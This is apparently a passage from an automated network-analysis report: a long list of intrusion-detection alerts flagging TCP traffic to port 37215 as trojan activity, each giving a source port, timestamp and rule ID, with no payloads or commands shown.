                  Source Port:43442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.034591
                  SID:2829579
                  Source Port:48280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.605633
                  SID:2829579
                  Source Port:49398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.896647
                  SID:2829579
                  Source Port:37846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.135908
                  SID:2829579
                  Source Port:41098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.549975
                  SID:2829579
                  Source Port:33394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.183618
                  SID:2829579
                  Source Port:37410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.901812
                  SID:2835222
                  Source Port:46612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.510241
                  SID:2829579
                  Source Port:40664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824276
                  SID:2835222
                  Source Port:55946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.224904
                  SID:2835222
                  Source Port:33252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.055063
                  SID:2835222
                  Source Port:33376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.786182
                  SID:2835222
                  Source Port:35164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.429574
                  SID:2835222
                  Source Port:39712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.686169
                  SID:2829579
                  Source Port:45436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.472722
                  SID:2829579
                  Source Port:51166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.084191
                  SID:2829579
                  Source Port:35188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.847000
                  SID:2829579
                  Source Port:44438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.578082
                  SID:2829579
                  Source Port:35064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.359553
                  SID:2835222
                  Source Port:37980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.938620
                  SID:2835222
                  Source Port:56552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.775914
                  SID:2835222
                  Source Port:45742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.335477
                  SID:2835222
                  Source Port:43562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.352654
                  SID:2835222
                  Source Port:52490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422019
                  SID:2829579
                  Source Port:35598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.147392
                  SID:2835222
                  Source Port:48576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.473474
                  SID:2829579
                  Source Port:56782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.353550
                  SID:2835222
                  Source Port:46264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.929011
                  SID:2835222
                  Source Port:57038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.072006
                  SID:2835222
                  Source Port:38908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.121135
                  SID:2835222
                  Source Port:35030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.849524
                  SID:2829579
                  Source Port:38474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.376968
                  SID:2829579
                  Source Port:59324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.501459
                  SID:2835222
                  Source Port:45304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204295
                  SID:2835222
                  Source Port:51888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.228280
                  SID:2829579
                  Source Port:37524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.446922
                  SID:2835222
                  Source Port:51348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.479456
                  SID:2829579
                  Source Port:43462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.165302
                  SID:2829579
                  Source Port:53108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.825093
                  SID:2835222
                  Source Port:41386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.409717
                  SID:2835222
                  Source Port:55818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879292
                  SID:2829579
                  Source Port:37454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.554051
                  SID:2835222
                  Source Port:38074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.859593
                  SID:2829579
                  Source Port:57744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.886736
                  SID:2835222
                  Source Port:59168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.712584
                  SID:2829579
                  Source Port:42652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.479791
                  SID:2829579
                  Source Port:58178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.838798
                  SID:2835222
                  Source Port:45270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.778030
                  SID:2829579
                  Source Port:51804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.840826
                  SID:2829579
                  Source Port:45436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.625074
                  SID:2835222
                  Source Port:40350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.501573
                  SID:2835222
                  Source Port:58250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.856885
                  SID:2829579
                  Source Port:49182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.821697
                  SID:2829579
                  Source Port:34720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.858543
                  SID:2829579
                  Source Port:55462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.185610
                  SID:2835222
                  Source Port:48054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514525
                  SID:2835222
                  Source Port:46978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.611390
                  SID:2835222
                  Source Port:47086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.501791
                  SID:2835222
                  Source Port:55842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.839677
                  SID:2835222
                  Source Port:36112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389175
                  SID:2835222
                  Source Port:51170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.915046
                  SID:2835222
                  Source Port:51100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.542796
                  SID:2835222
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.664238
                  SID:2835222
                  Source Port:45966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.358336
                  SID:2835222
                  Source Port:34842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.864255
                  SID:2835222
                  Source Port:44470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609289
                  SID:2835222
                  Source Port:48476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.849785
                  SID:2829579
                  Source Port:48208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.239343
                  SID:2829579
                  Source Port:49942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.651125
                  SID:2835222
                  Source Port:46732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121517
                  SID:2829579
                  Source Port:43276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.477184
                  SID:2835222
                  Source Port:54000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.842206
                  SID:2835222
                  Source Port:57518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.532257
                  SID:2835222
                  Source Port:56540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.668862
                  SID:2835222
                  Source Port:53654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.014654
                  SID:2829579
                  Source Port:48268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.762631
                  SID:2829579
                  Source Port:36014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.761894
                  SID:2829579
                  Source Port:43506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.943853
                  SID:2835222
                  Source Port:40544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.209261
                  SID:2835222
                  Source Port:60780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.424272
                  SID:2835222
                  Source Port:47192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.298148
                  SID:2835222
                  Source Port:43180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.845196
                  SID:2829579
                  Source Port:36310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.289116
                  SID:2835222
                  Source Port:49134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.652224
                  SID:2835222
                  Source Port:38388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217232
                  SID:2829579
                  Source Port:40440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.169986
                  SID:2835222
                  Source Port:52076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.757846
                  SID:2829579
                  Source Port:33164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.932458
                  SID:2829579
                  Source Port:41142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.701278
                  SID:2829579
                  Source Port:38668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.946420
                  SID:2829579
                  Source Port:57592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.471512
                  SID:2835222
                  Source Port:36172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.479166
                  SID:2829579
                  Source Port:33766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622082
                  SID:2835222
                  Source Port:50288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.190813
                  SID:2829579
                  Source Port:47580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.479200
                  SID:2829579
                  Source Port:33178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.926952
                  SID:2835222
                  Source Port:49422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.574047
                  SID:2835222
                  Source Port:42914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574763
                  SID:2835222
                  Source Port:38180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.850530
                  SID:2829579
                  Source Port:40900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.533375
                  SID:2829579
                  Source Port:52112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.373658
                  SID:2829579
                  Source Port:53740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.558808
                  SID:2835222
                  Source Port:60126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.532227
                  SID:2835222
                  Source Port:55250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.598606
                  SID:2835222
                  Source Port:51142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.393770
                  SID:2829579
                  Source Port:38502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.887861
                  SID:2835222
                  Source Port:54712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.670311
                  SID:2829579
                  Source Port:58562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.762632
                  SID:2829579
                  Source Port:51896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867755
                  SID:2829579
                  Source Port:55226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.208753
                  SID:2829579
                  Source Port:40604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.800332
                  SID:2835222
                  Source Port:56762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.426125
                  SID:2835222
                  Source Port:45874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.410350
                  SID:2829579
                  Source Port:52684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.812084
                  SID:2835222
                  Source Port:50736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.727335
                  SID:2835222
                  Source Port:35174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.470847
                  SID:2829579
                  Source Port:51882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.519267
                  SID:2829579
                  Source Port:42666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.714271
                  SID:2835222
                  Source Port:57610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.510690
                  SID:2835222
                  Source Port:35070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.513977
                  SID:2835222
                  Source Port:35538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.771791
                  SID:2829579
                  Source Port:38104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.509874
                  SID:2829579
                  Source Port:34450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.489140
                  SID:2835222
                  Source Port:58646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.324421
                  SID:2835222
                  Source Port:55290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.421104
                  SID:2835222
                  Source Port:46112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.910234
                  SID:2829579
                  Source Port:44140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.528508
                  SID:2829579
                  Source Port:42144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.885444
                  SID:2829579
                  Source Port:47724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.959862
                  SID:2835222
                  Source Port:55994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.975587
                  SID:2829579
                  Source Port:35128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.641712
                  SID:2835222
                  Source Port:56180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.027039
                  SID:2829579
                  Source Port:32978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.454005
                  SID:2829579
                  Source Port:46178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.853365
                  SID:2829579
                  Source Port:36664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.928325
                  SID:2835222
                  Source Port:44132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.131839
                  SID:2829579
                  Source Port:43596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.230409
                  SID:2835222
                  Source Port:51022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.898852
                  SID:2829579
                  Source Port:56374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.748001
                  SID:2835222
                  Source Port:54942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.891273
                  SID:2835222
                  Source Port:35698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.645814
                  SID:2835222
                  Source Port:60114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.877941
                  SID:2835222
                  Source Port:51140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.514091
                  SID:2829579
                  Source Port:41118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.783625
                  SID:2835222
                  Source Port:37236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.556595
                  SID:2829579
                  Source Port:41296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.758146
                  SID:2835222
                  Source Port:34668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.387304
                  SID:2829579
                  Source Port:38968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839204
                  SID:2835222
                  Source Port:34078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.273288
                  SID:2835222
                  Source Port:34296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.863602
                  SID:2835222
                  Source Port:34288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260584
                  SID:2835222
                  Source Port:53214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.256885
                  SID:2829579
                  Source Port:44964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.178484
                  SID:2835222
                  Source Port:56194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.659846
                  SID:2829579
                  Source Port:46834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.741035
                  SID:2829579
                  Source Port:54342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.242902
                  SID:2829579
                  Source Port:36044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.272369
                  SID:2835222
                  Source Port:34186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.524637
                  SID:2835222
                  Source Port:33062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231407
                  SID:2829579
                  Source Port:49858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.528044
                  SID:2835222
                  Source Port:46546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.177629
                  SID:2829579
                  Source Port:53524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.219162
                  SID:2829579
                  Source Port:52342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.838798
                  SID:2829579
                  Source Port:35102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.372263
                  SID:2829579
                  Source Port:34914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.821658
                  SID:2829579
                  Source Port:50304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.449371
                  SID:2835222
                  Source Port:60864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.877145
                  SID:2829579
                  Source Port:41884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.630985
                  SID:2829579
                  Source Port:54456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155476
                  SID:2835222
                  Source Port:53940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.888378
                  SID:2835222
                  Source Port:51234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.833735
                  SID:2835222
                  Source Port:50970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.764309
                  SID:2829579
                  Source Port:39618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.860339
                  SID:2835222
                  Source Port:37688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.890568
                  SID:2835222
                  Source Port:35498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.798571
                  SID:2829579
                  Source Port:56862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.334232
                  SID:2829579
                  Source Port:49290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.354295
                  SID:2835222
                  Source Port:50282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.224405
                  SID:2829579
                  Source Port:53714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.855316
                  SID:2829579
                  Source Port:57986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.858980
                  SID:2829579
                  Source Port:46300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.890895
                  SID:2829579
                  Source Port:58392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.224532
                  SID:2829579
                  Source Port:56292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.929002
